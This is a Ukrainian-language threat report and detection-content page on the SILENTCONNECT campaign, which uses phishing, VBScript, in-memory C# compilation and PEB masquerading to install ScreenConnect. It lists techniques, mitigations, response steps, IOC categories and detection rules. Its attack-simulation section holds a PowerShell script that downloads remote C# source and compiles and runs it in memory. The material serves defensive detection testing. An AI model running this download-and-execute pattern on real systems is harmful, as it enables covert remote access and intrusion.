Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Звіт описує багатоступеневий завантажувач під назвою SILENTCONNECT, який покладається на звантажувач VBScript, компіляцію C# коду в пам’яті за допомогою PowerShell та маскування PEB для тихого розгортання інструменту дистанційного управління ConnectWise ScreenConnect. Атака починається з фішингового електронного листа, який направляє жертв через сторінку CAPTCHA Cloudflare Turnstile перед тим, як передавати корисне навантаження VBScript. Цей скрипт отримує компонент C# з Google Drive, компілює його в пам’яті, а потім завантажує MSI ScreenConnect з шкідливої домену для встановлення персистентності як служба Windows. Кампанія поєднує довірені хостингові сервіси з «живими» бінарниками для зниження детекцій.
Розслідування
Лабораторії Elastic Security виявили ланцюжок незвичайних попереджень Windows Script, які в кінцевому рахунку відкрили файл E-INVITE.vbs, що розміщений на Cloudflare R2. Аналіз показав запуск скрипта PowerShell, який викликає curl.exe для отримання C# файлу з Google Drive, який потім компілюється і виконується безпосередньо в пам’яті. Завантажувач використовував NtAllocateVirtualMemory для резервування пам’яті, застосував маскування PEB і додав виключення Windows Defender перед завантаженням інсталятора ScreenConnect за допомогою curl і його виконання через msiexec. Мережева телеметрія виявила підключення встановленого клієнта до C2 з bumptobabeco.top через TCP порт 8041.
Пом’якшення
Команди безпеки повинні стежити за підозрілими командами PowerShell, що викликають curl.exe, створенням тимчасових папок у C:Temp та незвичайною компіляцією Add-Type завантаженого C# коду. Логіка детекції також повинна враховувати маскування PEB, відмічаючи процеси, чиї значення BaseDLLName або FullDllName не відповідають реальному шляху модуля. Вихідний трафік до незнайомих доменів, які розміщують MSI інсталятори, слід блокувати або ретельно перевіряти, а виконання msiexec повинно бути жорстко кероване із недовірених джерел. Виключення Windows Defender можна застосовувати тільки через затверджені адміністративні процеси.
Відповідь
Якщо виявлені ці індикатори, негайно ізолюйте уражений хост, зупиніть шкідливий процес і видаліть встановлену службу ScreenConnect. Зберіть судово-медичні докази, включаючи тимчасові файли, скомпільовану .NET збірку та будь-які MSI пакети, що були скинуті. Відновіть несанкціоновані виключення Windows Defender та відновіть налаштування UAC, якщо вони були змінені. Потім проведіть пошук у ширшому середовищі на наявність схожих артефактів завантажувача та оновіть контент детекції з усіма нововиявленими IOCs.
"graph TB %% Класи визначень classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ccffcc classDef malware fill:#ffdddd %% Вузли action_phishing["<b>Дія</b> – <b>Техніка</b>: T1566 Фішинг<br/><b>Опис</b>: Електронні листи з фішингом доставляють шкідливий контент."] class action_phishing action action_user_click["<b>Дія</b> – Користувач натискає на шкідливий лінк на сторінці Cloudflare Turnstile."] class action_user_click action malware_vbscript["<b>Шкідливе програмне забезпечення</b> – файл VBScript<br/><b>Техніка</b>: T1059.005 Visual Basic<br/><b>Опис</b>: Виконує скрипт на Visual Basic для запуску додаткового коду."] class malware_vbscript malware tool_powershell["<b>Інструмент</b> – PowerShell<br/><b>Техніка</b>: T1059.001 PowerShell<br/><b>Опис</b>: Виконує команди PowerShell для управління системою."] class tool_powershell tool tool_curl["<b>Інструмент</b> – Curl<br/><b>Техніка</b>: T1570 Трансфер інструментів на обладнаннях<br/><b>Опис</b>: Отримує файли з віддаленого сховища (Google Drive)."] class tool_curl tool malware_compile["<b>Шкідливе програмне забезпечення</b> – Компіляція C# у пам’ять<br/><b>Техніка</b>: T1027.004 Компіляція після доставки<br/><b>Опис</b>: Компілює C# код безпосередньо у пам’яті."] class malware_compile malware process_injection["<b>Процес</b> – NtAllocateVirtualMemory<br/><b>Техніка</b>: T1055.002 Ін’єкція в процес<br/><b>Опис</b>: Виділяє пам’ять у цільовому процесі для ін’єкції корисного навантаження."] class process_injection process malware_peb["<b>Шкідливе програмне забезпечення</b> – Маскування PEB<br/><b>Техніка</b>: T1036.011 Маскування<br/><b>Опис</b>: Переписує BaseDLLName, щоб виглядати як winhlp32.exe."] class malware_peb malware tool_cmstp["<b>Інструмент</b> – CMSTP<br/><b>Техніка</b>: T1218.003 Проксі-виконання системних бінарних файлів CMSTP<br/><b>Опис</b>: Використовує інтерфейс COM CMSTP для обходу UAC."] class tool_cmstp tool action_defender_exclusion["<b>Дія</b> – <b>Техніка</b>: T1564.012 Виключення шляхів файлів<br/><b>Опис</b>: Додає виключення в Microsoft Defender для шкідливого виконуваного файлу."] class action_defender_exclusion action tool_screenconnect_msi["<b>Інструмент</b> – ScreenConnect MSI<br/><b>Техніка</b>: T1570 Трансфер інструментів на обладнаннях<br/><b>Опис</b>: Завантажує інсталятор для віддаленого адміністрування."] class tool_screenconnect_msi tool tool_msiexec["<b>Інструмент</b> – Msiexec<br/><b>Техніка</b>: T1547.010 Виконання порту монітора автозапуску під час завантаження<br/><b>Опис</b>: Виконує беззвучну інсталяцію служби ScreenConnect."] class tool_msiexec tool malware_screenconnect["<b>Шкідливе програмне забезпечення</b> – Служба ScreenConnect<br/><b>Техніка</b>: T1219 Інструменти віддаленого доступу<br/><b>Опис</b>: Залишається на системі та підключається до командного центру."] class malware_screenconnect malware %% Сполучення action_phishing –>|веде до| action_user_click action_user_click –>|завантажує| malware_vbscript malware_vbscript –>|запускає| tool_powershell tool_powershell –>|використовує| tool_curl tool_curl –>|отримує джерело для| malware_compile malware_compile –>|завантажує в| process_injection process_injection –>|дозволяє| malware_peb malware_peb –>|дозволяє| tool_cmstp tool_cmstp –>|запускає| action_defender_exclusion action_defender_exclusion –>|завантажує| tool_screenconnect_msi tool_screenconnect_msi –>|встановлює через| tool_msiexec tool_msiexec –>|створює| malware_screenconnect "
Потік Атаки
Детекції
Ймовірний фішинг через Google Drive (через проксі)
Перегляд
Ймовірна інфільтрація/екфільтрація даних/К2 через сторонні сервіси/інструменти (через dns)
Перегляд
Ймовірний сценарій PowerShell, що містить Lolbin (через powershell)
Перегляд
Ймовірний ланцюг LOLBAS (через cmdline)
Перегляд
MsiExec викликаний процесом Shell (через cmdline)
Перегляд
Ймовірний первинний доступ через фішинг з розширеннями файлів, як TLD (через dns)
Перегляд
Ймовірна активність командного управління через спробу комунікації домену ПЗ віддаленого доступу (через dns)
Перегляд
Домен Google Drive був вирішений підозрілим процесом (через dns_query)
Перегляд
Підозріле командне управління через запит DNS з незвичайним доменом верхнього рівня (TLD) (через dns)
Перегляд
Підозріле використання CURL (через cmdline)
Перегляд
Ймовірне виконання файлів Msiexec у незвичній директорії (через cmdline)
Перегляд
IOC (HashSha256) для виявлення: Від запрошення до інфекції: як SILENTCONNECT доставляє ScreenConnect
Перегляд
IOC (Електронні листи) для виявлення: Від запрошення до інфекції: як SILENTCONNECT доставляє ScreenConnect
Перегляд
IOC (SourceIP) для виявлення: Від запрошення до інфекції: як SILENTCONNECT доставляє ScreenConnect
Перегляд
IOC (DestinationIP) для виявлення: Від запрошення до інфекції: як SILENTCONNECT доставляє ScreenConnect
Перегляд
Підозріле виконання PowerShell з завантаженням та виконанням C# Payload [Windows Powershell]
Перегляд
Виявлення завантаження інсталятора SILENTCONNECT ScreenConnect та виконання [Створення процесу Windows]
Перегляд
Виконання Симуляції
Передумова: Тест на відповідність телеметрії та базових налаштувань повинен бути пройдено.
Обґрунтування: Цей розділ детально відображає точне виконання техніки супротивника (TTP), призначеної для активізації правила детекції. Команди та наратив мають безпосередньо відображати виявлені TTP та бути спрямовані на генерацію саме тієї телеметрії, яка очікується логікою детекції. Абстрактні або невідповідні приклади можуть призвести до неправильної діагностики.
-
Опис Атаки та Команди:
- Початкове розвідка та отримання корисного навантаження – Зловмисник розміщує шкідливий C# файл на Google Drive. Використовуючи PowerShell, він завантажує сирий файл через
Invoke-WebRequest. - Компіляція в Пам’ять – Завантажений C# файл компілюється безпосередньо у пам’яті з використанням
Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $src. - Виконання – Отриманий .NET тип ініціалізується, і його
метод Run() викликається, встановлюючи зворотній з'єднанням.Обфускація - Obfuscation – Командний рядок запускається з
-ExecutionPolicy Bypassщоб уникнути блокувань політик, відповідаючи точним рядкам, які спостерігає правило.
- Початкове розвідка та отримання корисного навантаження – Зловмисник розміщує шкідливий C# файл на Google Drive. Використовуючи PowerShell, він завантажує сирий файл через
-
Скрипт Тесту Регресії:
# ------------------------------------------------- # Сценарій умовного супротивника – активізує правило Sigma # ------------------------------------------------- # 1. Визначте URL віддаленого C# файлу корисного навантаження (посилання для спільного доступу на Google Disk) $payloadUrl = "https://drive.google.com/uc?export=download&id=YOUR_FILE_ID" # 2. Завантажте C# джерело у змінну $csharpSource = Invoke-WebRequest -Uri $payloadUrl -UseBasicParsing | Select-Object -ExpandProperty Content # 3. Скомпілюйте та завантажте корисне навантаження в пам'ять Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $csharpSource -Language CSharp # 4. Виконайте корисне навантаження (передбачається клас із назвою "Payload" зі статичним методом "Run") # ------------------------------------------------- -
Команди очищення:
# Видаліть усі тимчасові файли (ніхто не створений) та вивантажте збірку з пам'яті # PowerShell не надає прямого вивантаження; за необхідністю завершіть процес Stop-Process -Id $PID -Force